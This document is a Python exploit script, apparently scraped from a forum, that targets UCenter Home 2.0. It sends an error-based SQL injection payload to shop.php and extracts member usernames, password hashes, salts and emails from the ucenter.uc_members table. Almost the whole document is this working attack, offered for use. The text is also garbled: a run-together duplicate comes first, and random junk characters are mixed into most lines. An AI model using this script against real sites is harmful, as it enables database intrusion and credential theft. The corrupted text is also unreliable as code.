#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ y: O( q* u; x& @, E+ c
1 p. G: I" E+ @
8 m' M8 ]" d, }#!/usr/bin/env python $ j5 E2 w" C3 J; }( ~! \
3 g& X; \% O0 C R! f0 d1 K
import sys
$ l7 t- w( J. [7 simport urllib2
% |7 f z- w+ P" f$ e- s8 Pimport re
* h- _ z( C8 j/ j( u5 S% b8 j2 ^ , B8 A/ A1 L( C& i# k
def info():
% {# a9 ^: I" d8 T6 [ print 'From:http://www.exploit-db.com/exploits/14997/'
( K H3 [8 |3 q" \% _2 I print 'http://www.hake.cc/Web_loudong/' w* Z3 K: B3 t# ]! E. ]
print 'changed:qiaoy'
1 p T+ O* o' P' b9 w( B/ W+ N print 'exp:' & f( o* v6 D9 d( L( a
print ' ./UCenter_Home_2.0.py site'
4 v2 i6 y+ O2 f3 c$ [ " Z8 ]# A7 P; ~0 ~% Y0 ?' `
def main():
4 [1 x# F9 N* W: _ if len(sys.argv) != 2: ' [5 x! |0 m8 Y. E
info()
4 B" _& v1 y( w* X1 E else:
) t2 [; Z0 a- D9 Y, n0 N site = sys.argv[1]
3 h' h. A* W+ g if site[0:7] == 'http://': 5 P W- i3 }" ~ I
sitesite =site
7 r: ~& x; o6 f0 |. x5 H1 L5 B elif site[0:8] == 'https://': " ~% C' d y8 O3 M- x4 b
sitesite = site
4 A$ l4 L+ W. J, @! ]' C/ }2 X else:
; e; n+ h3 N7 _$ O. z7 j site = 'http://'+site 1 ?. x& K5 i; S* W8 O9 T
try: 2 z P& ~4 [ y5 W) M1 @
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' . a m2 ]5 t# `# X% G% D% V, o8 f
Value = urllib2.urlopen(url).read()
/ ]7 A+ C$ y. N. h2 G8 h0 \7 d# b Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
( D+ v8 A5 U; V% a, d* i! ^ hacked = Msg.split(':')
& e3 o' ~. Y" H x print 'Name: '+hacked[1]
* N3 G) C2 U8 [1 p" X0 |' W print 'Passwd: '+hacked[2]
( T, B0 G- q6 B* @! ^ print 'salt: '+hacked[3]
. e' @4 m6 a( k; ? print 'email: '+hacked[4] 8 q: f: c7 [- m4 d f1 c; p
except: ) ]5 g- e. ^3 d6 M# g
print 'Sorry,I can\'t work............'
8 J( T4 L8 w5 ]/ t+ S) i/ u
3 v- Z5 O& b6 }+ J, z$ E) [+ g3 U: oif __name__ == '__main__':
$ N5 L8 u" k& y8 G main() |